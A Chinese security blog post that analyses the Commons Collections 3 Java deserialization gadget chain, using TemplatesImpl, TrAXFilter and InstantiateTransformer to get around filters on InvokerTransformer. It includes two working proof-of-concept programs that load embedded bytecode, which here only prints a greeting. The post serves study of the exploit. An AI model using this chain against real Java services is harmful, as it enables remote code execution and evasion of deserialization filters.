[Java安全] CommonsCollections3链分析

前言

因为一些反序列化的过滤工具的原因,把CC1的InvokeTransformer等给过滤了,所以设计出CC3来绕过⼀些规则对InvokerTransformer的限制

CC1与TemplatesImpl

前一篇文章介绍到了TemplatesImpl,那么这里就用上了,我们知道TemplatesImpl的利用链是这样的

1
2
3
4
TemplatesImpl#newTransformer() ->
TemplatesImpl#getTransletInstance() -> 
TemplatesImpl#defineTransletClasses()-> 
TransletClassLoader#defineClass()

入口点在newTransformer,那么我们可以利用TemplatesImpl,去连接上我们的CC1链子

看完下面的例子就能懂了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.*;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
  public static void main(String[] args) throws Exception {
    byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBAA5UZW1wQ2xhc3MuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABAAlUZW1wQ2xhc3MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAALAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEAALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAABMABAAUAAwAFQABABAAAAACABE=");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
    setFieldValue(templates,"_name","test");
    setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
    // templates.newTransformer();
    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(templates),
        new InvokerTransformer("newTransformer",null,null)
    };
    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
    outerMap.put("test", "xxxx");
  }

  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj,value);
  }
}

image-20221003212452013

CC3

介绍完了CC1和TemplatesImpl,接下来就进行CC3的分析了,在ysoserial的CC3中,可以发现他用了两个新的东西,一个叫TrAXFilter,一个叫InstantiateTransformer

先从TrAXFilter说起,他的构造方法会执行

1
_transformer = (TransformerImpl) templates.newTransformer();

image-20221003213637978

所以我们需要找到一个能执行构造方法的,这里就有个InstantiateTransformer完美解决了这个问题,他在执行transform的时候就会进行构造方法的调用

image-20221003214411111

我们构造POC

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
  public static void main(String[] args) throws Exception {
    byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBAA5UZW1wQ2xhc3MuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABAAlUZW1wQ2xhc3MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAALAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEAALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAABMABAAUAAwAFQABABAAAAACABE=");
    TemplatesImpl templatesobj = new TemplatesImpl();
    setFieldValue(templatesobj,"_bytecodes",new byte[][]{bytes});
    setFieldValue(templatesobj,"_name","test");
    setFieldValue(templatesobj,"_tfactory",new TransformerFactoryImpl());
    // templates.newTransformer();

    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(TrAXFilter.class),
        new InstantiateTransformer(new Class[] { Templates.class }, new Object[] { templatesobj } )
    };
    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
    outerMap.put("test", "xxxx");
  }

  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj,value);
  }
}

成功加载字节码

image-20221003213616488

Licensed under CC BY-NC-SA 4.0